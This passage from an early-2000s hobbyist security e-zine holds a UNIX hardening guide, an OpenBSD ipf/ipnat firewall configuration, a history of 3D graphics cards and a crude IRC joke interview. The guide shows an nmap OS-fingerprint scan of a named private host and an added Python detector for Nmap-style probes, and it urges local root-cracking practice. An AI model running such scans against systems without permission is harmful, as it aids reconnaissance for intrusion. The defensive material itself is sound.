:   1 - PC board
:
:
:
: Construction
: ------------
:
: Etch your PC board. If you don't know how to do that, then grab yourself a
: Dick Smith 'Fun Way' electronics book for kids...
:
: Use the overlay board to identify where the components are to be placed.
: Begin assembly by fitting the resistors first. Next fit the 8 diodes and
: two transistors. The last components to be placed are the slide switch
: and mini trim pot. Connect the leads to the tee-piece as shown, where the
: left side plugs into the wall socket and the right side is where your phone
: plugs in. The labels A B C match the pins A B C on the circuit diagram.
: Link D and E together with some hookup wire.
:
: =A== =C==
:
: =D== =E==
:
: ==== ==== ==== ====
:
: =B== ====
:
: Before connecting the device to the exchange, turn it on. If both LEDs
: light up you are on your way to success! Fit the tee piece into your phone
: line. You now need to adjust the trim pot until the red LED turns off.
: Pick up your second phone and the red LED should turn on.
:
: I hope you enjoy constructing and using this project.
:
: Black_Smurf
:
:....
:
...[ ]........................................................................
: :
: #06 UNIX Security - lymco :
: --------------- :
:.[_]........................................................................:
:
...:
:
: This article is a basic text on UNIX Security tips for the newbie.
:
: #! Contents
: 1. Watching your logs
: 2. Firewalling
: 3. Inet Daemons
: 4. System Processes
: 5. Recommended Home Setup
: 6. Extra Ideas
: 7. Links
:
: # Watching your logs
: I was recently invited to a local ISP and talked with some of the
: System Administrators. One thing I found funny was that one of the admins
: was IRC'ing (as root), and every 5 minutes or so switched consoles,
: entered the 'w' command, had a quick read and went back to IRC.
: Sure, this system could have been fine and nothing bad could have been
: happening, but this system was a Redhat 6.1 server, basically a default
: install with wu-ftpd. Sad, no?
:
: I found it depressing watching these so-called "Certified Admins" sitting
: back, drinking kola beer, talking about how difficult it was to get sound
: working on Linux, etc. Not only did they use the "But no system is secure!"
: line too much, they didn't monitor any logs whatsoever. Whatever you
: do, you must monitor your logs! You don't have to sit there with bulging
: eyes reading every line written to the buffer, but for god's sake keep
: an eye on them. Gnome has a nice utility for monitoring logs. It has
: a soothing GUI interface and basically outputs the data of multiple
: logs to a listbox. It's a very useful application. If you're a console
: user, my favourite method is to set up syslogd to route messages depending
: on the facility and/or priority.
:
: Basically, keep an eye on:
: 1) /var/log/messages (the main log)
: 2) /var/log/secure which shows logins, SU's, etc.
: 3) /var/log/daemon (for *BSD users)
:
: Now I've seen Jestar mention he monitors his SQL/Apache logs as well. The
: majority of inet daemons output their information to 'messages', but
: have a look through /etc/syslog.conf to see how you'd like certain
: daemons/devices to output their information.
:
: Something else you could try is to literally print important logs
: (error messages in this case; thanks to fyre):
:
: *.err                                   /dev/lp0
:
: Or, you could throw error messages to a log file:
:
: *.err                                   /var/log/errors
:
: Check the manpages for more examples (man syslog.conf), and ask around
: on the net to see what other people do with syslog.conf...
:
: Another thing we would like to keep an eye on is what our users are
: doing. An important program to have handy is ttysnoop. This basically
: replaces the user's shell with the ttysnoop client, which mirrors the
: user's terminal to your TTY. All you do is run the program with the
: username you'd like to "snoop".
:
: Also, if you're interested to see what TCP connections your users are
: making, have a look at fyre's tcpspy (http://eryf.net/software); it
: basically logs via /dev/log (syslog) which user is making TCP connections
: to which host, etc.
:
: Programs like Tripwire and AIDE can be valuable to have running too.
: Since there's such an immense range of programs in this class to choose
: from, checkout http://www.wiretapped.net/ . These programs are
: typically known as host-based Intrusion Detection Systems, and are
: virtually a must for the security conscious admin.
:
: # Firewalling
: Setting up a good firewall is important to dump/ignore DoS attacks, ie:
: malformed packet headers, etc. Not to mention to be able to monitor
: what's coming in and out of your network. There is a variety of
: firewall applications on the net, I personally use ipchains since it's
: easy to setup and there's alot of references for it on the internet.
: However, there are some alternatives.
:
: Checkout http://www.wiretapped.net for firewall applications
: or perhaps http://linuxberg.com as an alternative - it gives you good
: explanations of each program.
:
: In the way of port monitoring applications, Snort and Portsentry are
: two popular choices. Both offer detection & logging options for
: various port scans, probes and the like. (Snort: http://www.snort.org ,
: Portsentry: http://www.psionic.com/abacus/portsentry/)
:
: Setting up IPChains:
: Read phase5's article(s) in infosurge 2. He gives good examples in
: setting up ipchains and also tcpwrappers. His article is
: at http://infosurge.rendrag.net/infosurge-2.txt. technion@wiretapped.net
: has his own firewalling script available online at http://coons.org.
: Also, you may like to check out rc.firewall, located at:
: http://jsmoriss.mvlan.net/linux/rcf.html
:
: # Inet Daemons
: What do you _really_ need to run? Firstly, if you haven't got it, grab
: Nmap. My favourite network security tool. Just do a basic nmap scan on
: your localhost ($ nmap localhost). What services are running? Do you
: need them? Do you know what they are? (Nmap is available from
: http://www.insecure.org/nmap/)
:
: As I mentioned earlier I visited a few ISPs, and one of them was
: incredibly shocking. I was sitting at a root shell playing around. Anyway,
: I just ssh'd into a shell account and ran a few nmaps on their machines.
: Their main server showed basically all of the default Redhat services.
: At first I wondered, "Is this just a play-around box for the Jnr Admin to
: practice on?". I was wrong - very wrong. It was one of the main servers.
: I showed one of the admins, and he was like: "I like to use linuxconf
: over the network; Printer? We need to print stuff.. sunrpc.. what's that?
: Oh well.". I don't think he even knew that these services existed.
: My point being, if you don't know what a service does, either "man
: service", or look it up on google. More than likely though, you don't
: need the service.
:
: If you chose a 'Workstation Install' when you installed your UNIX
: system (eg: Slackware Linux) then check whether you have an
: /etc/inetd.conf. This file has your standard inet daemons listed out,
: and whatever isn't commented out is running. By default telnet, ftp
: and a bunch of other services are enabled, so if the file exists, comment
: them all out before you even get your system on the net.
:
: Anyway, lets go through the main daemons:
:
: Telnet -- Don't use it, use SSH. Why? Because telnet transfers
: everything in clear text - usernames, passwords, the entire session.
: Usernames and passwords can be trivially intercepted with
: packet sniffers such as sniffit, ethereal, dsniff, etc.
:
: FTP -- Probably the most commonly exploited daemon. As with all
: services listening on ports < 1024, it runs with root privilege at some
: point during its lifetime, and therefore may be vulnerable to
: a remote root exploit depending on which specific version you're
: running. Decide: do you REALLY need this? If yes, I recommend that you
: don't use WuFTPd (which is commonly shipped with SuSE and Redhat).
: OpenBSD's FTPd is quite decent (a Linux port of this is available;
: look for ftpd-BSD). Whatever you do, make sure you get the most recent
: version and apply any and all vendor/developer-supplied patches.
:
: Webserver -- Do you need it? If yes, get the recent -STABLE version
: of Apache.
:
: SMTP -- Do you need it? If yes, don't use sendmail; remove it, there are
: alternatives, try Postfix. However, I personally disable it since I use
: my ISP's SMTP server.
:
: X11 -- If you'd like to use the X server over a LAN, go for it. Make
: sure to only allow connections to X11 from local hosts, and not from
: external hosts.
:
: For everything else, decide for yourself - more than likely you don't
: need it. However, as I stated earlier read up on the purpose of
: each service, what it does, how it works, etc.
:
: # System Processes
: These are your current systems processes running. Run 'ps auwwx'. You
: will see the services started at init bootup (gpm, etc), also the
: programs you may be currently running, such as BitchX, micq, etc. Now
: alot of the system processes which open at boot time run as root. Not
: to mention some of these aren't really required (see above), and may
: cause security problems.
:
: Everything runs as the UID of it's owner (exception: SUID/SGID apps),
: and with system processes this is commonly root.
:
: Try the following shell script, which lists the setuid/setgid files on the
: system (the ones that run as the file's owner rather than as you):
:
:
#!/bin/sh
# An exact mode such as '-perm 4755' matches only that mode; '-perm -4000'
# matches any file with the setuid bit set, whatever the rest of the mode is.
find / -type f \( -perm -4000 -o -perm -2000 \) -ls > suid.txt 2>/dev/null
echo "View suid.txt for a list of setuid/setgid files"
echo "If a file doesn't need to run as its owner, drop the bit: chmod u-s <file>"
echo "or restrict who may run it: chmod o-x <file>; chgrp wheel <file>"
:
: As I've mentioned in the Inet Daemons section, if you don't know what
: a program does, look it up.
:
: # Recommended Home Setup
: A) Make sure to choose the right operating system for you. I run
: Slackware 7.1. My next favourite Linux distribution is Debian 2.2.
:
: B) Firewall your box. If you're a console user, have a read-only TTY
: designated for your messages log to be piped to. If you are an X hippie
: (like me), have a virtual desktop with your log filtering program on it. I
: have Gnome's System Log utility running all the time, and check up on it
: often. Also, 'man syslog.conf', and see how you'd like syslogd set up.
:
: C) As I stated earlier, shut down all of the inet daemons you can. If
: you rarely give SSH access to users, then activate it manually instead
: of having it running all the time. My personal preference is to have SSH
: installed, but have it disabled. If anybody requires access to my system
: I simply enable SSH and set up the TCP wrappers to only accept connections
: from their IP. (Writing a quick bash script to automate this process is
: a nice idea).
:
: SMTP, as I said earlier: who needs it? You're a home user. Simply
: use a remote SMTP server from your ISP.
:
: Like a lot of us, we are interested in Web development. Thus we need an
: httpd running. I use Apache + MySQL + PHP.
:
: So that's it. What does your average home user require to be enabled to
: the outside world? Nothing. Unless of course you are a Web developer as I
: mentioned in the above paragraph. In this case you would require httpd
: and SQL running. No big deal.
:
: D) Go through all of those system processes in suid.txt and change the
: permissions and the group of the file.
:
: E) Patch your daemons and system services. Go to securityfocus.com, look
: for patches for the daemons you are running. Also check out your OS's
: website (eg. www.redhat.com or www.openbsd.org) for updated kernels, etc.
:
: F) Try running OpenBSD as a gateway machine. George (aphex) has written
: a text on how to setup an OpenBSD gateway in this infosurge issue (8).
:
: # Extra Ideas
:
: A) Conceal what OS you are running: The first thing a cracker will do
: when trying to break your system's security is run some portscans.
: Usually they will use something like nmap -O xxx.xxx.xxx.xxx, the -O
: being an OS fingerprint (which bases its results on characteristics
: of the TCP/IP stack). Knowing what operating system is running on a
: targeted machine is more than likely the most valuable piece of
: information if you are planning to gain access to a system, mainly
: because he/she can edit an exploit's shellcode depending on the remote
: operating system.
:
: It's possible to detect these Nmap scans, since, for example, they'll
: often send packets set with odd combinations of TCP flags not often seen
: "in the wild". Depending on how the operating system responds, Nmap is
: more often than not able to make an educated guess about what operating
: system is running. On Windows, BlackICE (a decent home firewall) has a
: feature to detect Nmap fingerprints. Under Unix, Portsentry (mentioned
: above) and Snort (also mentioned above) readily detect most scans.
:
: As I was saying, quite some time ago Rendrag introduced me to a Linux
: kernel patch which basically changes the way the OS replies to these TCP
: flags. Damien has this "stealth patch" built into his Linux kernel,
: running underneath Debian 2.2. It mainly blocks TCP RST packets, which
: slows down the scan and makes the ports time out while waiting to
: receive a response. This way it makes -O particularly unreliable.
:
: An example of this: (Please don't nmap his box)
:
: # nmap -O vorlon.rendrag.net
: Starting nmap V. 2.54BETA7 (www.insecure.org/nmap/ )
:
: /* Lets just skip the open ports */
:
: No OS matches for host (If you know what OS is running on it, see
: http://www.insecure.org/cgi-bin/nmap-submit.cgi).
:
: Dogcow from Wiretapped.net/2600.org.au has these files available at:
: http://the.wiretapped.net/security/operating-systems/stealth-kernel-patches/
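:
: As an added example (not the article's own code, and not how BlackICE,
: Portsentry or Snort do it), here is a small Python detector that runs over
: ipmon-style firewall log lines and groups packets carrying the odd TCP flag
: combinations mentioned above by source address. The log lines are
: constructed for the example and only approximate ipmon's real layout.

```python
#!/usr/bin/env python3
"""Flag Nmap-style probes in ipmon log lines by their TCP flag combinations.

Added example, not part of the original article. The log lines used as
input are constructed for this example and only approximate the layout
ipmon prints ("src,port -> dst,port PR proto ... -FLAGS"), so adapt LOG_RE
to the exact ipmon output on your system.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Pull out source address, destination port, protocol and the TCP flags
# token (a "-" followed by any of S A F R P U; a bare "-" means no flags).
LOG_RE = re.compile(
    r"(?P<src>\d+\.\d+\.\d+\.\d+),(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+),(?P<dport>\d+)\s+PR\s+(?P<proto>\w+)"
    r"(?:.*?\s-(?P<flags>[SAFRPU]*)(?=\s|$))?"
)


def classify_flags(flags: str) -> Optional[str]:
    """Name the probe type if `flags` is a combination a normal TCP client
    never sends; return None for ordinary traffic (SYN, ACK, PSH/ACK, ...)."""
    f = set(flags)
    if not f:
        return "NULL scan (no flags set)"
    if {"F", "P", "U"} <= f:
        return "Xmas scan (FIN+PSH+URG)"
    if {"S", "F"} <= f:
        return "SYN+FIN probe"
    if {"S", "R"} <= f:
        return "SYN+RST probe"
    if "F" in f and "A" not in f:
        return "FIN scan (FIN without ACK)"
    return None


def scan_log(lines: List[str], min_hits: int = 2) -> Dict[str, List[Tuple[int, str]]]:
    """Group suspicious TCP probes by source address.

    Returns {source: [(dest_port, probe_type), ...]} for every source that
    sent at least `min_hits` such packets; a single odd packet is noise,
    a run of them against different ports is a scan.
    """
    hits: Dict[str, List[Tuple[int, str]]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m.group("proto") != "tcp" or m.group("flags") is None:
            continue            # not TCP, or no flags token on the line
        reason = classify_flags(m.group("flags"))
        if reason:
            hits[m.group("src")].append((int(m.group("dport")), reason))
    return {src: probes for src, probes in hits.items() if len(probes) >= min_hits}


def report(findings: Dict[str, List[Tuple[int, str]]]) -> str:
    """Human-readable summary, one source per line."""
    out = []
    for src, probes in sorted(findings.items()):
        ports = sorted({p for p, _ in probes})
        kinds = sorted({r for _, r in probes})
        out.append(f"{src}: {len(probes)} odd-flag probes on ports {ports}: {'; '.join(kinds)}")
    return "\n".join(out)


# Constructed sample: one host probing three ports with NULL, Xmas and
# SYN+FIN packets, a normal HTTP client, a DNS packet and a lone FIN.
SAMPLE_LOG = """\
03/02/2001 22:10:01.100000 tun0 @0:30 b 203.0.113.77,41234 -> 198.51.100.9,22 PR tcp len 20 40 - IN
03/02/2001 22:10:01.120000 tun0 @0:30 b 203.0.113.77,41235 -> 198.51.100.9,80 PR tcp len 20 40 -FPU IN
03/02/2001 22:10:01.140000 tun0 @0:30 b 203.0.113.77,41236 -> 198.51.100.9,25 PR tcp len 20 40 -SF IN
03/02/2001 22:10:05.000000 tun0 @0:17 p 192.0.2.10,33000 -> 198.51.100.9,80 PR tcp len 20 60 -S IN
03/02/2001 22:10:05.200000 tun0 @0:17 p 192.0.2.10,33000 -> 198.51.100.9,80 PR tcp len 20 52 -A IN
03/02/2001 22:10:09.000000 tun0 @0:30 b 192.0.2.44,5353 -> 198.51.100.9,53 PR udp len 20 60 IN
03/02/2001 22:10:12.000000 tun0 @0:30 b 192.0.2.55,50000 -> 198.51.100.9,139 PR tcp len 20 40 -F IN
"""

if __name__ == "__main__":
    print(report(scan_log(SAMPLE_LOG.splitlines())))
```

Only the host that sent several malformed packets is reported; the lone FIN from 192.0.2.55 stays below the threshold unless you lower min_hits.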
:
: Another thing to try is to change the /etc/issue and /etc/issue.net files.
: These files basically hold a banner for telnet (and for when you initiate
: a new TTY), and by default they contain the operating system, kernel
: version, etc. So change this, or set it blank -- whatever! I like the
: program linux_logo, which makes a nice banner for your issue files. You can
: get it to show additional information, or no information at all, about
: your system details. (Red Hat users -- see /etc/rc.d/rc.local and uncomment
: the lines which write over these files). Linux_Logo is available at
: linuxberg and also freshmeat.
:
: B) Write shell scripts to help you complete tasks: Writing your own
: scripts can help you do complex tasks quickly. The way I set them
: up is by defining aliases that point to shell scripts. For example, alias
: killuser="/home/lymco/bash-files/killuser.sh" would be in my bash init
: file (.bashrc or whatever you prefer). Not only does this method provide
: you with an automated process, it saves you time++.
:
: C) Subscribe to mailing lists: A good proportion of my learning has been
: gathered from mailing lists. They can introduce you to new computing
: aspects which you might never have thought of. You can get questions
: answered, or like me.. lurk in the background and learn from the posts.
:
: I recommend visiting securityfocus.com and/or insecure.org, and checking
: out the mailing lists available. May I further note, it might be an idea
: to read through some recent archives of the mailing lists, just to make
: sure it's the right one for you. I'm signed up with several mailing lists,
: including 2600-AU, Bugtraq, Vuln-Dev, IDS, and Linux Kernel Security. All
: have been great, and have kept me "on the ball" with security issues on
: the internet.
:
: D) Learn from your own computer: A good way to update your security is
: to try to crack it locally. That is, log on as a standard user and try
: to crack root. Not only do you update your learning of vulnerabilities,
: but you also test your system admin skills. Once you think it's _secure_,
: ask a friend on IRC (one with skillz) to break your system's security. If
: he/she does, ask how they did it, and learn from them.
:
: E) Learn C: I have not met a _GOOD_ "hacker" who is not a C guru. By knowing
: C inside out and back to front you understand how computers _really_
: work. You can look at some source code and say, "wait a minute, that
: strcpy() function is looking a bit dodgy.", or what have you. Learn C,
: learn Assembly, learn how to code. It will get you a long way.
:
: F) The right operating system: No matter what people say, I still
: believe Red Hat can be a secure server if it is in the hands of a good
: admin. Debian is a good option as well. Nonetheless OpenBSD > *, in
: regards to security. Even if you are a home user, it may be an idea to
: throw OBSD on a cheap box as your gateway.
:
: For a Linux workstation, tryout Debian 2.2 or Slackware 7.1.
:
: # Links
: http://infosurge.rendrag.net
: http://www.wiretapped.net
: http://www.2600.org.au
: http://www.freshmeat.net
: http://www.linuxberg.com
: http://www.securityfocus.com
:
: Hopefully the above information taught you something. It wasn't intended
: to be too full on, by the way. If you have any comments or questions,
: e-mail me at lym@thepentagon.com.
:
: "Over and out!",
:
: -- lymco http://dev.spanner.net
:
:....
:
...[ ]........................................................................
: :
: #07 Example configuration of an OpenBSD firewall - aphex :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: ->> intro
: The rules I use are rather slack, but more secure than 70%+ of the
: hosts out there. All this will work on the default install of OpenBSD
: 2.6 -> current. But if your machine is rather busy, you really should
: recompile the kernel with 'option NMBCLUSTERS=8192', otherwise you'll get
: errors like 'mb_map full' or the system might just hang. Other than that,
: there is no need to recompile your kernel to get this to work; GENERIC is
: fine. It is mainly designed for users with small home networks or small
: businesses, with dialup users in mind (sorry k, ikari).
:
: ->> ip forwarding
: IP Forwarding needs to be turned on. You can do this using sysctl, by
: typing 'sysctl -w net.inet.ip.forwarding=1' OR you can edit the file
: /etc/sysctl.conf by adding:
:
: net.inet.ip.forwarding=1
:
: ->> ipfilter, ipnat and ipmon
:
: ipf (ipfilter)
: ipfilter does just what its name suggests: it is a packet filter. To
: turn it on, simply:
:
: ipf -Fa -f /etc/ipf.rules -E
:
: This will flush the ruleset and enable the service. You should add
: 'ipfilter=YES' to rc.conf, to be started at boot. More on /etc/ipf.rules
: later. ipnat performs NAT. To turn it on:
:
: ipnat -CF -f /etc/ipnat.rules
:
: Which will also flush, and enable the service using the rules in
: /etc/ipnat.rules. Also add 'ipnat=YES' to rc.conf. Again, more on this
: later. And just for debugging purposes enable ipmon with:
:
: ipmon -Ds
:
: ->> /etc/ipf.rules
: The main advantage that ipf has over ipchains is the simplicity of the
: rules. Even if you know nothing about ipf, you can have a look at a
: large ruleset and half-understand it; of course at least half a brain
: is required. Here's an example:
:
: pass out from any to any
: pass in from any to any
:
: Now, not to state the obvious, but this roughly means 'allow any
: connection from any interface out through any other interface' and
: 'allow in any connection on any interface into the machine'. You see
: this, don't you? Well, that's all there is to ipf. The rest is just options,
: changed and added lines to this default configuration. Well I lie, there
: really are quite a lot of complex options and a bit of skill required for
: hardcore configurations. But most of the people reading this don't have
: national security clearance or Windows 2002 source code to protect. Yes
: I know you have ohday pron, but that doesn't count. Coming up is a
: decently secure configuration. It's fairly stock and has nothing too
: fancy, but it has some good examples in it:
:
: (Ed Note: "#" is used here as a comment in a configuration file rather
: than a command to be typed at a root prompt, as in other areas of IS 8)
:
# For reference:
# ne3 = ethernet to internal network
# tun0 = ppp interface to internet
# 192.168.0.* = internal network.

# IP filtering rules.
# loopback rules
pass out quick on lo0 all
pass in quick on lo0 all

# block tiny fragments
block in log quick proto tcp all with short

# drop source routed packets
block in log quick on tun0 all with opt lsrr
block in log quick on tun0 all with opt ssrr

# dont allow anyone to spoof non-routable addresses
block in quick on tun0 from 0.0.0.0/32 to any
block in quick on tun0 from 127.0.0.0/8 to any
block in quick on tun0 from 192.168.0.0/16 to any
block in quick on tun0 from 172.16.0.0/12 to any
block in quick on tun0 from 10.0.0.0/8 to any
block out quick on tun0 from any to 127.0.0.0/8
block out quick on tun0 from any to 192.168.0.0/16
block out quick on tun0 from any to 172.16.0.0/12
block out quick on tun0 from any to 10.0.0.0/8

# allow certain classes of ICMP
pass in quick on tun0 proto icmp all icmp-type 0
pass in quick on tun0 proto icmp all icmp-type 3
pass in quick on tun0 proto icmp all icmp-type 11

# allow all access from internal interface
pass in quick on ne3 from 192.168.0.0/16 to any

# allow outside access to http, ssh and mail
# (flags S/SA only makes sense for tcp, so the proto must be given)
pass in quick on tun0 proto tcp from any to any port = 80 flags S/SA
pass in quick on tun0 proto tcp from any to any port = 22 flags S/SA
pass in quick on tun0 proto tcp from any to any port = 25 flags S/SA

# allow DNS from my optus nameservers
# ('quick' is needed here, or the final block rule below would win)
pass in quick on tun0 proto udp from 203.2.75.2 port = 53 to any
pass in quick on tun0 proto udp from 203.2.75.12 port = 53 to any

# let outgoing traffic out
pass out quick on tun0 proto tcp from any to any flags S keep state
pass out quick on tun0 proto udp from any to any keep state
pass out quick on tun0 proto icmp from any to any keep state

# block all by default
block in log quick on tun0 all

# end ruleset
:
: If any packet doesn't fit into one of these rules, then it is dumped
: and logged. There are rules to politely reject connections etc, but
: don't bother. The 'log' option is handy for those who are paranoid out
: there. As you can see you can tell ipf a lot of information: which port,
: what protocol, what address, etc. Once that's all added to /etc/ipf.rules,
: restart ipf. You can check if your rules are in place by typing:
:
: ipfstat -io
:
: Which will display the current active rules.
:
: ->> /etc/ipnat.rules
: This file is a lot smaller than ipf.rules, merely because there is not
: much to configure.
:
# Reference:
# tun0 = ppp interface to internet
# 0/32 = if your ip is dynamic, otherwise put your ip here.
# 192.168.0.* = internal network

# ipnat ruleset
# ipnat uses the first rule that matches, so the FTP proxy has to come
# before the general map rules or it will never be reached.
# This will make ipnat act as a proxy for active FTP sessions
map tun0 192.168.0.0/24 -> 0/32 proxy port ftp ftp/tcp

# port map (port ranges are written low:high in ipnat)
map tun0 192.168.0.0/24 -> 0/32 portmap tcp/udp 1025:65000

# handle ICMP, etc.
map tun0 192.168.0.0/24 -> 0/32

# end ruleset
:
: Here you see only 3 lines: one to map ports, one to handle all other
: things, and one for a transparent ftp proxy. I should also mention
: that if you want to redirect connection attempts because, for example,
: you host your small website off a server machine on your internal
: network, add a derivative of the following line into /etc/ipnat.rules:
:
: rdr tun0 0.0.0.0/0 port 80 -> 192.168.0.2 port 8080 tcp
:
: Where 0.0.0.0/0 matches whatever address tun0 currently has on the
: firewall (packets arriving from the internet are addressed to the
: external ip, not to 192.168.0.1), and 192.168.0.2 is the webserver.
: This will map port 80 on the external (tun0) interface of your firewall
: to port 8080 on the server located on your network at 192.168.0.2. The
: last thing that needs to be done is to run 'ipf -y' every time you get
: allocated a new ip address. You can do this manually OR by adding
: '!bg ipf -y' to your /etc/ppp/ppp.conf script /inside/ your settings for
: your ISP.
:
: ->> outro
: That's all the basics you'll need to know. If you really want to protect
: your data go with the most secure setup.. unplug the computer from any
: network. Even z3r0c00l can't transmit packets over thin air. For the
: average user, this sort of setup will be good enough.
:
: -aphex -http://pulsewidth.net
:
:....
:
...[ ]........................................................................
: :
: #08 History of 3d acceleration - Maticles :
: ---------------------------- :
:.[_]........................................................................:
:
...:
:
: Introduction
:
: 'llo - 'tis I Mat(icles if you prefer) - I used to be common on #infosurge,
: but got bored, and now Damien has me locked up in his closet treating
: me like a monkey and has me writing a 'History of 3d acceleration'
: review. Woohoo. 3d cards primarily surfaced late 1995 with the advent
: of 3dfx's Voodoo. I must admit, professional machines such as the Silicon
: Graphics Onyx did have 3d acceleration, but you'd be paying $15000 US
: for the privilege of owning such a card.
:
: About the first 3d consumer accelerator - 3Dfx's 'Voodoo Graphics Chip'
:
: The first 3d accelerator came from the Silicon Valley start-up company,
: 3Dfx Interactive, who developed the Voodoo based chip. The Voodoo
: generally had a hand-blistering 4mb of onboard memory (compared to 32mb
: and 64mb of today's standards) and had features such as accelerated MIP
: mapping and alpha transparencies. I bought such a beast in 1996 (or
: maybe it was 1997, I forget) for a whopping $210, which was expensive for
: a video card in those days; it was a yum-cha Atrend Helios. It allowed
: whooping detail on games such as Need For Speed 2:SE and GLQuake, both
: of which looked so err.. 'life like' it was scary. There were 'cool'
: things such as alpha-blended fog, fancy-dan textures and the whole thing
: just looked so schmick over its 2d variant.
:
: How the whole thing turned into a race.
:
: nVidia had just surfaced with its Riva 128, Rendition with its PowerVR,
: Matrox with the Mystique and a few other non-starters. This gave
: serious competition in the DirectX segment, but with 3Dfx Interactive
: holding the rights to Glide, these chips didn't hold much of a chance,
: until Microsoft. Microsoft got its act together and released Direct3D,
: which was easier to code than Glide, and it would run on a lot more
: systems, seeing as all of the 3d accelerators were Direct3D compliant.
: This got developers interested, so they started to code in Direct3D. (Some
: were cunning enough to do Direct3D and Glide - Glide was A LOT faster on
: Voodoo than Direct3D on the Voodoo.) Things were going well for nVidia,
: Rendition and Matrox with their cards, finding a nice little place in
: the market. Then 3Dfx made a return.
:
: 3Dfx's next plan.
:
: 3Dfx released the Voodoo2 chipset, which was capable of running in SLI. A
: little more on SLI later. The power of 2 'Voodoo 2' was simply awesome, to
: put it in 2 words. The frame rate was an astonishing 40fps at 640x480 in
: games such as Forsaken or Turok; this was simply unheard of in the past.
: Other chipset makers (nVidia, Matrox and newcomers to the 3D market, S3
: and ATi) created new cards also, but after 3Dfx had made a nice profit.
: Unfortunately Rendition basically stalled at the starting line, and failed
: to bring out a 3rd revision of PowerVR (2nd being PowerVR PCX2). S3 had
: just started with the Savage 3d and the Virge series. Virge really
: sucked in 3d, as did Savage 3d, so we won't speak about them much,
: as they weren't particularly ground-breaking products. ATi released the
: Rage which ended up being a massive success in OEMs and laptops because
: of their cheapness, and they were alright for 3d applications. All these
: cards on the market from various companies started a 3d accelerator war,
: which meant new features came into place. A bit more after this...
:
: SLI
:
: SLI was 3Dfx's main feature in the Voodoo 2's. SLI means Scan Line
: Interleave, which basically means one 'Voodoo 2' card is doing one line,
: while the other is doing the line under it, as such:
:
: ----^^^^^^-- <-- 'Voodoo 2' card number 1
: ----.----.-- <-- 'Voodoo 2' card number 2
: ------->---- <-- 'Voodoo 2' card number 1
: ------------ <-- 'Voodoo 2' card number 2
: ----\\____/-- <-- 'Voodoo 2' card number 1
:
: And so forth. This allowed the speed to be basically doubled.
:
: The after effects of the first 3D war.
:
: After this came nVidia's TNT and TNT2, Matrox's G200 and 3Dfx's Voodoo3 as
: the major contenders. The Voodoo3 this time was a lot worse than the TNT
: and TNT2 because it was being held back by 16-bit. Bad 3Dfx. Bad. 16-bit
: sucks, it looks washed out and grainy; believe me, get a TNT/2 or Geforce
: offering and see, much yumness in 32-bit indeed. This section is rather
: boring as it's much the same as the first war, so I'll get to today's
: technologies.
:
: What yummy goodness we have today
:
: 3Dfx is dead. Yes, nVidia own them now, go to www.3dfx.com if you must.
: The Voodoo4/5 was released way after schedule, therefore it just didn't
: work. The Geforce 2 Ultra is now out, although expensive. For the same
: price as a Voodoo5 you can get the Geforce2 Pro, which looks better in
: my opinion and has faster FPS. Shh you Voodoo people, no one cares about
: 'Full-Screen Anti-Aliasing'; the Geforce 2 series (not MX though) can do
: it easily with a frame loss, but not enough for it to be jerky. Anyway,
: the Voodoo 5 has the SLI technology also, with the Voodoo 5 board (now
: being manufactured by 3Dfx's arm, STB [or something]), but even with this,
: it doesn't beat the Geforce 2. The Voodoo 4, meant to be in competition
: with the Geforce 2 MX, looks better competing with a TNT 2 Ultra; it just
: can't keep up with the Geforce 2 MX. What's so special about this Geforce,
: I hear you ask? Well, the Geforce is so special because it has a GPU,
: Graphics Processing Unit, therefore the CPU doesn't have to do transform
: and lighting effects; this means the CPU has more time for AI and other
: features. The Voodoo 5 doesn't have a GPU, .: it sucks. :)
:
: I'll name the variants on the Geforce series (in order of release): Geforce
: 256 - nVidia's first Geforce, sold a lot. Geforce DDR - A Geforce 256,
: but has DDR (Double Data Rate) so it operates twice per ram clock-cycle.
: Geforce 2 GTS - Geforce 256, but with 4 pipelines for textures, DDR ram,
: fast core, it just means more yummyness! - oh, it also has the nVidia
: Shader Rasterizer which means shadows look even more shadowy! Woohoo!
: Geforce 2 MX - The 'home office' version of the Geforce 2 GTS, has slower
: SDRAM, but is still 33% faster than the Geforce 256. Geforce 2 Ultra -
: Man. This one rocks. The speed is simply awesome, 1600x1200, ABSOLUTELY
: everything high in Quake 3 with 4x FSAA, and it's still not jerky. It
: rocks, trust me. Geforce 2 Pro - A Geforce 2 GTS, but with faster RAM.
: Geforce 2 Go! - The Geforce 2 GTS, but with some nifty power saving stuff
: so it can run in laptops without draining the battery in 0.39 seconds.
:
: ATi has made a comeback with the Radeon, which apparently (never seen one
: going) looks as good as a Geforce 2 and is slightly slower, but still has
: better drivers etc. But still, I'm yet to see one actually going. I'll
: update this in Infosurge 9.
:
: What's to come.
:
: Well, with 3Dfx gone, it's up to nVidia and ATi. S3 are gone, they're now
: Sonic Blue, who do other - non-interesting stuff. Rendition are gone in my
: opinion. So, nVidia and ATi, let's have a look. nVidia is releasing the
: 'NV20' (only a codename) which is speculated to be 7 times faster than
: the Geforce 2 Ultra; I don't believe it, and think it's just a rumour,
: plus, it's also rumoured to cost AU$1400, but nothing official is available
: on it. ATi is also making the Radeon 2 (speculation again) with a core
: twice as fast as the current one. I'll post up what I heard in Infosurge 9.
:
: Oooh, Damien has brought me dinner, is that light? Yes! I see daylight,
: but it hurts my pale closet skin.
:
: Ta ta Folks, until next time.
:
:....
:
...[ ]........................................................................
: :
: #?? Interview with a vampi..... uhhh, irc loser - Fleabag :
: --------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: <Fleabag> Evening phase5, thank you for taking time out of your busy
: lifestyle of drinking alone and masturbating to let me interview you.
: <zak> im not taking time out
: <zak> im doing both those things
: <zak> as we speak
: <Fleabag> Shall we get this baby rocking? Lets...
:
: <Fleabag> How did you get into phreaking?
: <zak> umm
: <zak> when i was a kid
: <zak> possibly as soon as i was born
: <zak> my family bought
: <zak> or had previously owned a phone
: <zak> it grew from their i guess
:
: <Fleabag> Have you ever had a homosexual experience?
: <zak> i thought we weren't going to go into this
: <zak> i dont give permission for my face to be on camera
: <zak> i want it blurred
: <zak> blurred
: <zak> !
:
: <Fleabag> Have you ever patted a monkey?
: <zak> yes
: <zak> often
: <Fleabag> I like monkeys.
: <zak> i like my monkey
: <zak> tho sometimes i have to beat it
: <zak> more and more often i have to beat my monkey
:
: <Fleabag> Whats your favourite band?
